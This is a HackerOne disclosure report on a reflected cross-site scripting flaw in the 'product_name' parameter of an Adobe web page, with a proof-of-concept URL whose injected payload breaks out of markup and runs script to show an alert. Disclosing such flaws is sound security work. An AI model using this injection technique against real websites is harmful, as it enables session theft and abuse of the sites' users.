Adobe: Adobe XSS

2015-03-06T17:22:26
ID H1:50389
Type hackerone
Reporter dsopas
Modified 2016-10-18T20:37:15

Description

A cross-site scripting vulnerability exists in the "product_name" variable of this Adobe web application. The XSS vector can be changed to work across browsers, and the following proof-of-concept works in Firefox.

Proof-of-concept: http://www.adobe.com/cfusion/google/fonts/content.cfm?spider=google&code=/type/browser/pdfs/BLCQ/BellCentennialStd-NameNum.pdf&type=resource&product_name=%3C/a%3E%3Cimg%20src=x%20onerror=alert%28/dsopas/%29%3E%3C!--